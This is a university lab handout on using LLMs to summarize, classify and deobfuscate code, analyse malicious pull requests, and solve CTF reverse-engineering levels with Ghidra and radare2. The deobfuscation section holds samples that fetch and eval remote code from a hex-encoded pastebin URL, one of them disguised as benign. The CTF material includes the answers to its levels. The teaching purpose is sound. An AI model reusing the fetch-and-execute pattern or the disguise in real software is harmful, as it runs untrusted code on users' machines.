Using an LLM such as ChatGPT, Gemini, or Copilot to aid in documenting, summarizing, classifying, analyzing, and reverse-engineering code can save developers and analysts a substantial amount of time and effort. To leverage this capability, however, one must understand which tasks the models can perform reliably in order to prevent errors. In this lab, you will use LLMs to analyze different code examples and determine whether the results are accurate. To begin, change into the code directory for the exercises and install the packages.
cd cs475-src
git pull
cd 08*
uv init --python 3.13 --bare
uv add -r requirements.txt
Code summarization is often done by humans in order to generate documentation that can be used to allow others to understand code. One of the more reliable uses for LLMs is to produce such documentation. In Python, docstrings are used to provide this information. Consider the code below that reverses a string, but does not have any documentation associated with it.
def string_reverse(str1):
    reverse_str1 = ''
    i = len(str1)
    while i > 0:
        reverse_str1 += str1[i - 1]
        i = i - 1
    return reverse_str1
The documentation for this function can be provided in a number of formats. It is labor-intensive and error-prone for a developer to craft appropriate documentation that follows a particular formatting convention. Use an LLM to automatically generate documentation for the above function in the Sphinx format.
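For reference, a Sphinx-style docstring generated for this function might resemble the sketch below. The wording is illustrative, not the only acceptable answer, and the function body is condensed to a slice purely for brevity:

```python
def string_reverse(str1):
    """Return a reversed copy of a string.

    :param str1: The string to reverse.
    :type str1: str
    :returns: A new string containing the characters of ``str1``
        in reverse order.
    :rtype: str
    """
    return str1[::-1]

print(string_reverse("hello"))
```

The `:param:`, `:returns:`, and `:rtype:` fields are the info field lists Sphinx renders into formatted documentation.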
Repeat the generation using the numpy format for the code below:
import sys

import requests

def connect(url, username, password):
    try:
        response = requests.get(url, auth=(username, password))
        response.raise_for_status()
        return response.text
    except requests.RequestException as e:
        print(f"Error: {e}\nThis site cannot be reached")
        sys.exit(1)
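For comparison, a NumPy-style docstring for connect might look like the sketch below. The stub omits the function body so only the documentation format is shown; the wording is illustrative:

```python
def connect(url, username, password):
    """Fetch the contents of a URL using HTTP basic authentication.

    Parameters
    ----------
    url : str
        The URL to request.
    username : str
        The username for basic authentication.
    password : str
        The password for basic authentication.

    Returns
    -------
    str
        The body of the HTTP response on success.

    Raises
    ------
    SystemExit
        If the request fails for any reason.
    """
```

Note that NumPy-style docstrings use underlined section headers (Parameters, Returns, Raises) rather than Sphinx's field lists.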
When summarizing code, we can programmatically parse the program based on the language it is written in before sending it to an LLM for analysis. Within the directory, there's a Python parsing program that uses the GenericLoader document loader and LanguageParser parser to implement a Python code summarizer.
def summarize(path):
    loader = GenericLoader.from_filesystem(
        path,
        glob="*",
        suffixes=[".py"],
        parser=LanguageParser(language="python"),
    )
    docs = loader.load()
    prompt1 = PromptTemplate.from_template("Summarize this Python code: {text}")
    chain = (
        {"text": RunnablePassthrough()}
        | prompt1
        | llm
        | StrOutputParser()
    )
    output = "\n".join([d.page_content for d in docs])
    result = chain.invoke(output)
    return result
View the source file in the src directory to get an understanding of what it does.
Run the program in the repository below:
uv run 01_code_summarize.py
Within the program's interactive shell, have the program summarize the file.
src/p0.py
Understanding unknown code is a task one might give an LLM, especially if the code fits within the model's context window. For example, one might use an LLM to determine whether code downloaded from the Internet is malicious. Such an approach might be used to detect and prevent execution of malware that hijacks resources on a computer system, deploys ransomware, or sets up a backdoor.
For each of the example programs, examine its code. Then, use the prior program to summarize it.
Examine the code for the program taken from an article on LLM-assisted malware analysis of Python packages. Its original source can be found here.
Then, use the prior program to summarize the code.
Another example from the article is also included. Its original source can be found here.
Then, use the prior program to summarize the code.
Classifying unknown code is another task one might give an LLM. Similar to the prior exercise, we can configure a prompt to have an LLM analyze whether code performs specific operations that might be indicative of malware, such as data exfiltration, file creation, process launching, and environment variable access.
We can slightly modify our prior code to ask an LLM to evaluate whether a particular program performs each operation. This is done via the prompt shown below:
You are an advanced security analyst. Your task is to perform a behavioral analysis looking for specific behaviors such as:
- **Data exfiltration**: Detect if data is sent off-machine or communicates with external IPs or servers.
- **File creation**: Identify instances where files are created, deleted, or modified in the file system.
- **Process launching**: Detect if new processes are launched or system commands are executed.
- **Environment variable access**: Determine if environment variables are read or modified.
LLMs are good at returning output that matches a given format. For this exercise, we can specify the results be returned in JSON via the prompt as well:
For each behavior detected, provide supporting evidence and assign a confidence score (0 to 1).
Respond in JSON format with the following structure:
{{
"behavior_analysis": [
{{ "data_exfiltration": {{ "detected": true/false, "confidence": 0-1, "evidence": "description of findings", "code_snippet": "snippet of code" }} }},
{{ "file_creation": {{ "detected": true/false, "confidence": 0-1, "evidence": "description of findings", "code_snippet": "snippet of code" }} }},
...
}}
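Because the model is asked for JSON, the classifier's output can be parsed programmatically with the standard json module. A minimal sketch, using an illustrative hand-written response (not real LLM output) that follows the schema above:

```python
import json

# Illustrative response following the prompt's JSON schema (not real LLM output)
response = '''{
  "behavior_analysis": [
    {"data_exfiltration": {"detected": true, "confidence": 0.9,
       "evidence": "POSTs data to an external server",
       "code_snippet": "requests.post(url, data=payload)"}},
    {"file_creation": {"detected": false, "confidence": 0.8,
       "evidence": "no file writes found", "code_snippet": ""}}
  ]
}'''

analysis = json.loads(response)
for entry in analysis["behavior_analysis"]:
    for behavior, result in entry.items():
        # Report only behaviors the model flagged as present
        if result["detected"]:
            print(f"{behavior}: confidence {result['confidence']}")
            print(f"  evidence: {result['evidence']}")
            print(f"  snippet: {result['code_snippet']}")
```

Parsing the response this way is what lets the lab programs iterate over each category and surface the supporting code_snippet evidence.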
Run the program in the repository below to perform program classifications.
uv run 02_code_classify.py
Within the program's interactive shell, have the program classify the file. For each classification category marked as 'true', examine the code_snippet the LLM returns as evidence. Repeat the classification for each of the remaining example files, again examining the evidence for every category marked 'true'.

Open-source repositories managed via git are often targets for malicious software developers. Adversaries can publish malicious repositories, submit malicious commits, or initiate malicious pull requests. Automatically monitoring and reporting on potential threats and vulnerabilities in a repository can be useful, with services such as GitHub's Dependabot and Snyk's code analysis offerings providing real-time notifications on potential issues in a codebase. However, adversaries have been known to flood repositories with malicious pull requests that masquerade as legitimate services such as Dependabot attempting to patch vulnerable code, in order to trick a maintainer into installing an info stealer as shown below.

With repository maintainers receiving many pull requests from other developers wishing to add functionality or fix bugs in the codebase, it is important to verify that the requests are legitimate. Understanding unknown code is a task one might give an LLM, especially as a first pass, to reduce the load on the repository maintainer. In this exercise, we will combine an LLM's code analysis and summarization abilities with Python support for navigating GitHub repositories.
Retrieving a file from a repository and examining its commits allows one to identify problematic code and track how it entered the source tree. Consider the code below that utilizes PyGithub to retrieve the contents of a file in a repository given its path, to identify the last commit that modified the file, and to obtain the changes made as a result of that commit.
import os
import github
github_token = os.getenv("GITHUB_PERSONAL_ACCESS_TOKEN")
g = github.Github(github_token)
repo = g.get_repo("user/repository_name")
file_path = "path/to/file"
file_content = repo.get_contents(file_path).decoded_content.decode("utf-8")
commits = repo.get_commits(path=file_path)
commit = commits[0]
commit_data = f"- Commit SHA: {commit.sha}\n Author: {commit.commit.author.name}\n Date: {commit.commit.author.date}\n Message: {commit.commit.message}\n"
full_commit = repo.get_commit(commit.sha)
for file in full_commit.files:
    if file.filename == file_path:
        full_commit_data = f" - File: {file.filename}\n - Changes: {file.changes}\n - Additions: {file.additions}\n - Deletions: {file.deletions}\n - Diff: \n{file.patch}"
prompt = PromptTemplate(
input_variables=["file_path", "file_content", "commit_data", "full_commit_data"],
template="""You are a git file analyzer. The contents of the file and information on its last commit are given. 1. Explain what the file does. 2. Summarize what happened in the last commit for the file.
File name: {file_path}\n\n
File contents: {file_content}\n\n
Last commit: {commit_data} \n\n
Last commit modifications: {full_commit_data}\n\n
Answer: """
)
chain = prompt | llm
summary = chain.invoke({
'file_path': file_path,
'file_content': file_content,
'commit_data': commit_data,
'full_commit_data': full_commit_data
})
print(summary)
Run the program in the repository to analyze a file.
uv run 03a_git_file.py
Then, prompt the program about one of the prior examples:
08_.../src/p5.py
Examining individual commits also allows one to identify problematic code and track how it entered the repository. In this exercise, we prompt the model with instructions to identify whether particular commits are malicious, using the prompt template below.
commit_prompt = PromptTemplate(
input_variables=["author", "date", "message", "changes"],
template="""You are a git commit analyzer. A commit is given with the names of files and their changes. Analyze the commit to determine 3 things: 1. What the code in the commit does. 2. Whether the code does what the commit message claims. 3. Whether the code in the commit is malicious.
Commit author: {author} \n\n Commit date: {date} \n\n
Commit message: {message} \n\n File changes: {changes} \n\n
Answer: """
)
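The {changes} input to this template can be assembled from the files of a commit, much as in the previous exercise. The sketch below uses a hypothetical stand-in class in place of a live PyGithub file object so the formatting logic is visible on its own; a real program would iterate over the files of repo.get_commit(sha):

```python
class FakeCommitFile:
    """Hypothetical stand-in for a PyGithub commit file entry."""
    def __init__(self, filename, additions, deletions, patch):
        self.filename = filename
        self.additions = additions
        self.deletions = deletions
        self.patch = patch

# Hypothetical commit touching one file
files = [FakeCommitFile("setup.py", 3, 1, "+import requests\n-import os")]

# Flatten each file's metadata and diff into the text passed as {changes}
changes = "\n".join(
    f"- File: {f.filename}\n  Additions: {f.additions}\n"
    f"  Deletions: {f.deletions}\n  Diff:\n{f.patch}"
    for f in files
)
print(changes)
```

The resulting string, along with the commit's author, date, and message, fills the template's input variables.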
Run the program in the repository to analyze a commit.
uv run 03b_git_commit.py
Then, prompt the program about one of the commits:
9de23d6fa07fe80a526376ddd2de53c7641b6901
Pull requests are often initiated to add or modify code in a repository. Unfortunately, some requests may contain malicious changes. As a result, it is helpful to analyze them for potential issues using an LLM, or to have an LLM examine prior pull requests to track how problematic code entered the code base. Consider the code below that pulls out the contents of a particular pull request and prompts an LLM to determine if it is malicious.
g = Github(...)
repo = g.get_repo(...)
def process_pull_request(pr_number):
    """Given a pull request by its integer identifier, returns a summary of what it does and whether it is malicious"""
    pull = repo.get_pull(pr_number)
    pr_prompt = PromptTemplate(
        input_variables=["title", "body", "diff"],
        template="""You are a git pull request analyzer. A pull request is given with its title, description, and its source-code diff. Analyze the request to determine 3 things: 1. What the code in the pull request does. 2. Whether the code does what the title and description claim. 3. Whether the code is malicious. \n\n
Title: {title}\n\n Description: {body}\n\n Diff: {diff}\n\n
Answer: """
    )
    pr_data = {}
    pr_data['title'] = pull.title
    pr_data['body'] = pull.body or "No description provided."
    pr_data['diff'] = requests.get(pull.diff_url).text
    chain = pr_prompt | llm
    summary = chain.invoke({
        'title': pr_data['title'],
        'body': pr_data['body'],
        'diff': pr_data['diff']
    })
    return summary.content
Run the program in the repository to analyze a pull request.
uv run 03c_git_pull_request.py
Then, prompt the program about a specific pull request.
22
Modern malware utilizes a range of encoding and encryption techniques to hide itself from detection, and one would like to automate the task of reverse-engineering these pieces of malware. Consider the OSX.Fairytale malware, which XORs a string with the byte 0x30 and then Base64-encodes the result in order to hide it from anti-malware detectors looking for particular strings. An assembly snippet that shows the decoding routine is shown below:

A set of encrypted strings found in the malware is below.
U1hRXl5VXA==
cV5EWR1mWUJFQw==
H1JZXh9cUUVeU1hTRFw=
WEREQAofH0JDBgReQlweWV5WXx9CVVFUUUVEX1lAHkBYQA9AQlVWWUgNRUBUCg==
Prompt an LLM to decrypt the strings automatically without giving it any information.
Next, repeat the prompt, but give the LLM additional information: that the strings may use XOR encryption, or that they are part of the Fairytale malware.
Finally, repeat the prompt, but give the LLM the entire encryption algorithm, including the XOR key used, and ask it to perform the decryption. If it cannot do the operation, ask it for Python code you can run to decrypt the strings. Ensure you have produced the decrypted strings.
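If the model hands back code instead of performing the decryption, it should resemble the sketch below, which reverses the scheme described above by Base64-decoding each string and XORing every byte with 0x30:

```python
import base64

def fairytale_decrypt(encoded, key=0x30):
    """Base64-decode a string, then XOR each byte with the key."""
    data = base64.b64decode(encoded)
    return "".join(chr(b ^ key) for b in data)

strings = [
    "U1hRXl5VXA==",
    "cV5EWR1mWUJFQw==",
    "H1JZXh9cUUVeU1hTRFw=",
    "WEREQAofH0JDBgReQlweWV5WXx9CVVFUUUVEX1lAHkBYQA9AQlVWWUgNRUBUCg==",
]
for s in strings:
    print(fairytale_decrypt(s))
```

Because XOR is its own inverse, decryption simply reverses the two encryption steps in the opposite order.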
One of the common malicious uses for an LLM is to generate obfuscated, polymorphic code that can evade detection by security monitors. Conversely, an LLM can also reverse simple obfuscation techniques like the one shown below.
code = """
func = __builtins__["svyr".decode("rot13")]
func("test.txt", "w").write("Kaboom!\\n")
"""
s.execute(code)
Prompt an LLM to reverse engineer this code.
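One thing worth checking in the model's answer: the snippet is Python 2-era code (str.decode no longer exists in Python 3, and s.execute presumably refers to a sandbox object defined elsewhere in the lab). The rot13 lookup it performs can be reproduced in Python 3 with the codecs module:

```python
import codecs

# Decode the obfuscated builtin name the snippet looks up in __builtins__
name = codecs.decode("svyr", "rot13")
print(name)
```

In Python 2, `__builtins__["file"]` was the file-opening type, so the obfuscated snippet creates test.txt and writes "Kaboom!\n" to it.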
LLMs can also easily undo encoding mechanisms designed to disguise functionality. Consider the Python code below.
exec(''.join([chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(34)+chr(72)+chr(101)+chr(108)+chr(108)+chr(111)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41)]))
Prompt an LLM to identify the function of this code and deobfuscate it to generate its original form.
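One way to verify the model's answer without running the payload is to replace exec with print, which reveals the reconstructed source instead of executing it:

```python
# Same chr() chain as above, but printed rather than exec()ed
payload = ''.join([chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(34)+chr(72)+chr(101)+chr(108)+chr(108)+chr(111)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41)])
print(payload)
```

This inspect-before-execute habit is good practice whenever analyzing code that hides its payload behind exec or eval.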
An LLM that deobfuscates then analyzes code for malicious intent can be useful if it can do so reliably. Consider the code below.
import requests
eval(requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x66\x38\x34\x64\x66\x77\x30\x6d').text)
Run the code manually and determine its function. Then, ask an LLM to determine the function of the code.
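Note that the \xNN escapes are resolved by the Python parser itself, so printing the string literal, rather than handing it to eval via requests, reveals where the code comes from without executing anything:

```python
# The escaped literal from the snippet above; printing it shows the plain URL
url = '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x66\x38\x34\x64\x66\x77\x30\x6d'
print(url)
```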
An equivalent program is shown below, but with a bit of social engineering to make it appear innocuous.
import requests
def benign_code():
    """This code downloads additional benign functionality from a remote server."""
    eval(requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x66\x38\x34\x64\x66\x77\x30\x6d').text)
    foo = 'Benign code has been executed'
In a new session, ask an LLM the same questions again.
Consider the code below that is part of a CTF level in src/bloat.py. Your goal is to find the flag associated with the level.
import sys
a = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ" + \
    "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ "
def arg133(arg432):
    if arg432 == a[71]+a[64]+a[79]+a[79]+a[88]+a[66]+a[71]+a[64]+a[77]+a[66]+a[68]:
        return True
    else:
        print(a[51]+a[71]+a[64]+a[83]+a[94]+a[79]+a[64]+a[82]+a[82]+a[86]+a[78]+
              a[81]+a[67]+a[94]+a[72]+a[82]+a[94]+a[72]+a[77]+a[66]+a[78]+a[81]+
              a[81]+a[68]+a[66]+a[83])
        sys.exit(0)
    return False
def arg111(arg444):
    return arg122(arg444.decode(), a[81]+a[64]+a[79]+a[82]+a[66]+a[64]+a[75]+
                  a[75]+a[72]+a[78]+a[77])
def arg232():
    return input(a[47]+a[75]+a[68]+a[64]+a[82]+a[68]+a[94]+a[68]+a[77]+a[83]+
                 a[68]+a[81]+a[94]+a[66]+a[78]+a[81]+a[81]+a[68]+a[66]+a[83]+
                 a[94]+a[79]+a[64]+a[82]+a[82]+a[86]+a[78]+a[81]+a[67]+a[94]+
                 a[69]+a[78]+a[81]+a[94]+a[69]+a[75]+a[64]+a[70]+a[25]+a[94])
def arg132():
    return open('flag.txt.enc', 'rb').read()
def arg112():
    print(a[54]+a[68]+a[75]+a[66]+a[78]+a[76]+a[68]+a[94]+a[65]+a[64]+a[66]+
          a[74]+a[13]+a[13]+a[13]+a[94]+a[88]+a[78]+a[84]+a[81]+a[94]+a[69]+
          a[75]+a[64]+a[70]+a[11]+a[94]+a[84]+a[82]+a[68]+a[81]+a[25])
def arg122(arg432, arg423):
    arg433 = arg423
    i = 0
    while len(arg433) < len(arg432):
        arg433 = arg433 + arg423[i]
        i = (i + 1) % len(arg423)
    return "".join([chr(ord(arg422) ^ ord(arg442)) for (arg422, arg442) in zip(arg432, arg433)])
arg444 = arg132()
arg432 = arg232()
arg133(arg432)
arg112()
arg423 = arg111(arg444)
print(arg423)
sys.exit(0)
Use an LLM to deobfuscate the code and produce the decrypted flag.
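One detail the model should notice: the table a holds the printable ASCII characters starting at '!' (33), so a[i] is simply chr(33 + i) for indices below 94 (index 94 is a space). A hypothetical helper for decoding any index sequence from the file:

```python
# Lookup table from bloat.py: printable ASCII from '!' (33) to '~', then a space
a = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
    "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~ "

def decode(indices):
    """Turn a sequence of table indices into readable text."""
    return "".join(a[i] for i in indices)

# Hypothetical example: indices 71 and 72 map to chr(104) and chr(105)
print(decode([71, 72]))
```

Feeding each index sequence from the obfuscated program through such a helper recovers every string literal it builds.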
Once you have been able to reverse the code, change into the src directory and solve the level:
cd src
python3 bloat.py
Reverse engineering binary code is often necessary when dealing with malicious code. Many automated tools have been created for reverse engineering, often built using heuristics gleaned from manually analyzing a large corpus of binary payloads. Large language models perform a similar function and could potentially be used to help reverse-engineer difficult payloads automatically. Below is the assembly version of a CTF level for binary reverse engineering. It asks the user for a password string, then prints "Good Job." if it is correct.
.file "program.c"
.text
.section .rodata
.LC0:
.string "Enter the password: "
.LC1:
.string "%10s"
.LC2:
.string "ViZjc4YTE"
.LC3:
.string "Try again."
.LC4:
.string "Good Job."
.text
.globl main
.type main, @function
main:
.LFB0:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
movl $0, -12(%ebp)
subl $12, %esp
pushl $.LC0
call printf
addl $16, %esp
subl $8, %esp
leal -24(%ebp), %eax
pushl %eax
pushl $.LC1
call __isoc99_scanf
addl $16, %esp
movb $77, -13(%ebp)
movzbl -24(%ebp), %eax
cmpb %al, -13(%ebp)
je .L2
movl $1, -12(%ebp)
.L2:
leal -24(%ebp), %eax
addl $1, %eax
subl $8, %esp
pushl $.LC2
pushl %eax
call strcmp
addl $16, %esp
testl %eax, %eax
je .L3
movl $1, -12(%ebp)
.L3:
cmpl $0, -12(%ebp)
je .L4
subl $12, %esp
pushl $.LC3
call puts
addl $16, %esp
jmp .L5
.L4:
subl $12, %esp
pushl $.LC4
call puts
addl $16, %esp
.L5:
movl $0, %eax
movl -4(%ebp), %ecx
leave
leal -4(%ecx), %esp
ret
.LFE0:
.size main, .-main
.ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0"
.section .note.GNU-stack,"",@progbits
Prompt an LLM with the assembly code to see whether it can correctly identify the purpose of the binary and the user input that would cause this program to print "Good Job."
The source code of the level is shown below.
#include <stdio.h>
#include <string.h>
#define USERDEF0 'M'
#define USERDEF1 "ViZjc4YTE"
int main()
{
    char c0;
    int flag = 0;
    char user_input[11];
    printf("Enter the password: ");
    scanf("%10s", user_input);
    c0 = USERDEF0;
    if (user_input[0] != c0) flag = 1;
    if (strcmp(user_input + 1, USERDEF1)) flag = 1;
    if (flag)
        printf("Try again.\n");
    else
        printf("Good Job.\n");
    return 0;
}
Given the source code of the program, ask an LLM to explain it. See whether it correctly identifies it as the original source code of the binary and can provide the user input that causes the program to print "Good Job."
LLMs are great at summarizing sequential text, but most LLMs have not been trained on binary program data. To ensure this limitation doesn't prevent us from reverse-engineering the binary accurately, we can convert binary program data into a more concise, interpretable format before asking an LLM to perform the task. In this exercise, we'll leverage an external reverse engineering tool called Ghidra that is purpose-built to decompile binary program files. The output of this tool can then be used to perform an analysis. This pattern of having an LLM agent utilize purpose-built tools, rather than having the LLM perform the task itself, not only makes the task more accurate, it can also save substantial computational costs.
Bring up the course VM and ssh into it. Install the necessary dependencies:
sudo apt update -y
sudo apt install openjdk-21-jdk -y
cd $HOME
wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_11.0.3_build/ghidra_11.0.3_PUBLIC_20240410.zip
unzip ghidra_11.0.3_PUBLIC_20240410.zip
mv ghidra_11.0.3_PUBLIC ghidra
echo 'export PATH=$PATH:$HOME/ghidra/support' >> ~/.bashrc
source ~/.bashrc
Now that Ghidra is installed and its support folder is in the path, we can use the headless script in that folder to summarize binary files. The Python program in the repository calls analyzeHeadless with the -postScript option to analyze the binary file.
command = [
"analyzeHeadless",
project_dir,
project_name,
"-import",
binary_path,
"-postScript",
script_path
]
# Execute the command
result = subprocess.run(command, text=True, capture_output=True)
Then, a utility program (src/ghidra_example/jython_getMain.py) invokes Ghidra's decompiler to produce a function-level decompilation into C code. The program first creates a decompiler interface and then initializes the decompiler with the program argument. The monitor is used to monitor the progress made during the analysis.
decompiler = DecompInterface()
decompiler.openProgram(program)
monitor = ConsoleTaskMonitor()
The function manager manages all of the functions that are detected in the binary. The getFunctions(True) line will return an iterator over all of the functions detected in the binary.
function_manager = program.getFunctionManager()
functions = function_manager.getFunctions(True) # True to iterate forward
Then the program iterates over the returned functions, looking for ones whose names start with "main". When such a function is found, the program tries to decompile it; if decompilation succeeds, it prints the C code of the function.
results = decompiler.decompileFunction(function, 0, monitor)
if results.decompileCompleted():
    print("Decompiled_Main: \n{}".format(results.getDecompiledFunction().getC()))
else:
    print("Failed to decompile {}".format(function.getName()))
The output of this step can then be fed back to our original program for analysis.
Run the program:
uv run 04_ghidra.py
Find the decompiled C code that checks for the password.
Take the flag generated by the program, then run the binary file and enter the flag:
./src/ghidra_example/asciiStrCmp
Similar to Ghidra, the radare2 suite of reverse engineering tools can also be used to augment the reverse engineering process and aid the LLM in its analysis. To begin with, install the tools needed to build the radare2 decompiler, then use the radare2 package manager r2pm to install the decompiler package.
sudo apt update -y
sudo apt install -y meson ninja-build
r2pm -U
r2pm -ci r2dec
Consider the code below that utilizes r2's scripting support, r2pipe, to open an executable in r2 and run a simple decompilation process on it. Upon receiving the result of decompilation, the tool then sends it to the LLM to analyze.
prompt1 = PromptTemplate.from_template("""You are an expert reverse engineer, tasked with finding the flag by analyzing the code that is provided.
Here is the code:
{code}
Find the flag!
""")
# Open the binary using r2pipe
r2 = r2pipe.open(program)
# Perform initial analysis with radare2
# Do not show output of these two commands
_ = r2.cmd("aaa") # Analyze all functions and references
_ = r2.cmd("s main") # Seek to the main function, if exists
# Attempt to decompile the main function
output = r2.cmd("pdd")
# Send output to chain
chain = (
{'code':RunnablePassthrough()}
| prompt1
| llm
| StrOutputParser()
)
llm_result = chain.invoke(output)
Run the program:
uv run 05_radare2.py
Find the decompiled code generated by the decompiler.
Take the flag generated by the program, then run the binary file and enter the flag:
./src/ghidra_example/asciiStrCmp